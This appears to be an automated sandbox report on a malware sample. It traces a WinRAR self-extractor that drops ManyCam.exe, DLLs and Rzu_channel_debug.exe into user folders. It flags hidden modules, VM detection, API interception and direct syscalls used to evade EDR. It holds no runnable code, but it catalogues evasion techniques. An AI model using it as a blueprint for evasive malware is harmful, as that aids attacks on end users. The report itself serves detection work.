Source:	Binary string: ntdll.pdbUGP source: Rzu_channel_debug.exe, 0000000B.00000002.2376874008.00000000069CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376703286.00000000067C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375551356.00000000059CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376367009.00000000063C8000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375705747.0000000005BC9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374752885.00000000051CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375382442.00000000057CC000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376194096.00000000061C6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373132992.0000000003FC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374300838.0000000004BC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374606922.0000000004FCA000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374147935.00000000049CF000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373929546.00000000047C5000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377443683.0000000006FC1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377053611.0000000006BC6000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372608562.00000000039C7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372755524.0000000003BC7000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2372901125.0000000003DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2371525474.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373522877.00000000043CE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375872473.0000000005DCE000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2375080879.00000000055C1000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376033721.0000000005FC3000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2377244011.0000000006DCB000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2374913688.00000000053C9000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2376537168.00000000065C4000.00000004.00000001.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2373315397.00000000041CD000.00000004.00000001.000200
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831rp source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ManyCam.exe, 00000001.00000002.1718312431.0000000005180000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1717640762.0000000004E2B000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773211813.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1772167797.0000000001E0F000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000003.00000002.1773336558.0000000004EA3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2083131407.0000000005AE0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.2082606440.0000000005279000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 0000000C.00000002.2148501151.0000000001E4A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatory source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002CF3000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: Rzu_channel_debug.exe, 0000000B.00000002.2371854721.0000000002D33000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb source: ManyCam.exe, 00000001.00000003.1707239155.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmp, ManyCam.exe, 00000003.00000002.1772005883.000000000188D000.00000002.00000001.01000000.00000017.sdmp, ManyCam.exe, 0000000C.00000002.2148219294.000000000188D000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe, 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1693524385.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\cxcore099.pdbu source: ManyCam.exe, 00000001.00000003.1706798211.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716199035.00000000017E1000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 00000003.00000002.1771805787.0000000000CC1000.00000002.00000001.01000000.00000013.sdmp, ManyCam.exe, 0000000C.00000002.2147906276.0000000001751000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\cv099.pdb source: ManyCam.exe, 00000001.00000003.1706528467.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716354265.00000000018AF000.00000002.00000001.01000000.0000000E.sdmp, ManyCam.exe, 00000003.00000002.1771522596.0000000000BDF000.00000002.00000001.01000000.00000014.sdmp, ManyCam.exe, 0000000C.00000002.2148083400.000000000181F000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: d:\branch_2.5\bin\ManyCam.pdb source: file.exe, 00000000.00000003.1699413519.0000019994585000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000003.1710918732.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000000.1702094709.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000003.00000000.1714673779.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000003.00000002.1771064003.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000002.2146984400.000000000053B000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000C.00000000.2090239557.000000000053B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: d:\branch_2.5\Bin\CrashRpt.pdb source: ManyCam.exe, 00000001.00000003.1706209188.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000001.00000002.1716509296.0000000002012000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000003.00000002.1772302664.0000000002012000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: dbghelp.pdb source: ManyCam.exe, 00000001.00000002.1718820039.000000006D511000.00000020.00000001.01000000.0000000C.sdmp, ManyCam.exe, 00000003.00000002.1773936255.000000006D511000.00000020.00000001.01000000.00000016.sdmp, ManyCam.exe, 0000000C.00000002.2156061238.000000006D511000.00000020.00000001.01000000.00000016.sdmp, ManyCam.exe, 00000013.00000002.2258752567.000000006D511000.00000020.00000001.01000000.00000016.sdmp

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe

Code function: 1_2_0052309D IsProcessorFeaturePresent,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapAlloc,InterlockedCompareExchange,GetProcessHeap,HeapFree,

1_2_0052309D

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4126546

Jump to behavior

Source: dbghelp.dll.1.dr	Static PE information: real checksum: 0x8050c should be: 0x7cc68
Source: dawfefqddjbx.21.dr	Static PE information: real checksum: 0x21278f should be: 0x20b325
Source: dbghelp.dll.0.dr	Static PE information: real checksum: 0x8050c should be: 0x7cc68
Source: file.exe	Static PE information: real checksum: 0x0 should be: 0x5b62a8
Source: ydoicpxmibx.5.dr	Static PE information: real checksum: 0x21278f should be: 0x20b325

Source: file.exe	Static PE information: section name: .didat
Source: file.exe	Static PE information: section name: _RDATA
Source: Rzu_channel_debug.exe.5.dr	Static PE information: section name: Shared
Source: ydoicpxmibx.5.dr	Static PE information: section name: .xdata
Source: ydoicpxmibx.5.dr	Static PE information: section name: qdx
Source: dawfefqddjbx.21.dr	Static PE information: section name: .xdata
Source: dawfefqddjbx.21.dr	Static PE information: section name: qdx

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_005242D1 push ecx; ret	1_2_005242E4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BDC355 push ecx; ret	1_2_00BDC368
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_005242D1 push ecx; ret	3_2_005242E4

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\EH_Monitor_test\CrashRpt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\cximagecrt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\EH_Monitor_test\highgui099.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\CrashRpt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\cxcore099.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\EH_Monitor_test\cv099.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\ydoicpxmibx	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\cv099.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\highgui099.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\EH_Monitor_test\dbghelp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\EH_Monitor_test\cxcore099.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\dbghelp.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\EH_Monitor_test\cximagecrt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\dawfefqddjbx	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\ydoicpxmibx			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\dawfefqddjbx			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YDOICPXMIBX
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DAWFEFQDDJBX

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe

Code function: CvBoxFilter::init CvBoxFilter::init CvBoxFilter::init CvBoxFilter::init CvBoxFilter::init CvBoxFilter::init CvBoxFilter::init

3_2_00B9A3E0

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	API/Special instruction interceptor: Address: 6CDB7C44
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	API/Special instruction interceptor: Address: 6CDB7C44
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	API/Special instruction interceptor: Address: 6CDB7945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6CDB3B54
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	API/Special instruction interceptor: Address: 6C777C44
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	API/Special instruction interceptor: Address: 6C777945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6C773B54

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ydoicpxmibx			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dawfefqddjbx			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-21041

Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe TID: 7684	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe TID: 7680	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe TID: 7780	Thread sleep time: -55504s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe TID: 7968	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6BDDB0 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00007FF6EF6BDDB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6D3000 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,swprintf,SetDlgItemTextW,FindClose,swprintf,SetDlgItemTextW,SendDlgItemMessageW,swprintf,SetDlgItemTextW,swprintf,SetDlgItemTextW,	0_2_00007FF6EF6D3000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6E4150 FindFirstFileExA,	0_2_00007FF6EF6E4150
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_004164A0 lstrlenW,FindFirstFileW,GetFullPathNameW,SetLastError,	1_2_004164A0
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_004164A0 lstrlenW,FindFirstFileW,GetFullPathNameW,SetLastError,	3_2_004164A0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6EF6D5F78 VirtualQuery,GetSystemInfo,

0_2_00007FF6EF6D5F78

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2370328312.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2270513933.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2283066654.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370571330.000000000040C000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2359786629.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.0000000000485000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

graph_0-22809

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6EF6DBB94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6EF6DBB94

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe

1_2_0052309D

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6EF6E51D0 GetProcessHeap,

0_2_00007FF6EF6E51D0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6D6894 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6EF6D6894
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6D756C SetUnhandledExceptionFilter,	0_2_00007FF6EF6D756C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6DBB94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6EF6DBB94
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF6EF6D7388 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6EF6D7388
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00523722 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	1_2_00523722
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe	Code function: 1_2_00BDBBB6 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	1_2_00BDBBB6
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	Code function: 3_2_00523722 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	3_2_00523722

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtOpenKeyEx: Direct from: 0x7FF6DB5BC1FC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryValueKey: Direct from: 0x14011D93E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DB5EDDFD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DB683E9B	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryInformationProcess: Direct from: 0x7FF6DB5A0912	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryInformationToken: Direct from: 0x7FF6DB5B87C9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF66098B236
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQuerySystemInformation: Direct from: 0x7FF6DB6CE54E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryValueKey: Direct from: 0x7FF66087D448	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryValueKey: Direct from: 0x7FF66087D282	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtDeviceIoControlFile: Direct from: 0x7FF6DB5EC9BE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtClose: Direct from: 0x7FF66098C8D9
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF66085D0CA
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF6609934AE
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtDeviceIoControlFile: Direct from: 0x7FFE221C26A1
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtClose: Direct from: 0x7FF6DB6CC8B7
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6607B5082
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF6DB6D1DC3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x14011D808
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DB4F93AB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryValueKey: Direct from: 0x7FF6DB5BC96A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6607B93AB
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtReadVirtualMemory: Direct from: 0x7FF6DB6C778C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DB6CB664	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DB4F5082	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtClose: Direct from: 0x7FF66098C8B7
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtCreateFile: Direct from: 0x7FF6DB6C7AD9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DB59D0CA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF6DB59F625	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryValueKey: Direct from: 0x7FF6DB5BD282	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtCreateFile: Direct from: 0x7FF6DB6CA345	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe	NtQuerySystemInformation: Direct from: 0x76EF63E1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryValueKey: Direct from: 0x7FF6DB5BD448	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtCreateFile: Direct from: 0x7FF6DB59AF91	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF6608ADDB5
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryValueKey: Direct from: 0x7FF66087CED4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DB689E88	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtClose: Direct from: 0x7FF66098C8CB
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtProtectVirtualMemory: Direct from: 0x7FF660993586
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQuerySystemInformation: Direct from: 0x7FF6DB68744A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryInformationToken: Direct from: 0x7FF6608A68DA
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQuerySystemInformation: Direct from: 0x7FF6DB6160DF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQueryInformationProcess: Direct from: 0x7FF660860912
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQuerySystemInformation: Direct from: 0x7FF66098E54E
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtQuerySystemInformation: Direct from: 0x7FF6DB58EB16	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtCreateThreadEx: Direct from: 0x7FF6DB4F51E6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe	NtClose: Direct from: 0x7FF6608612A8
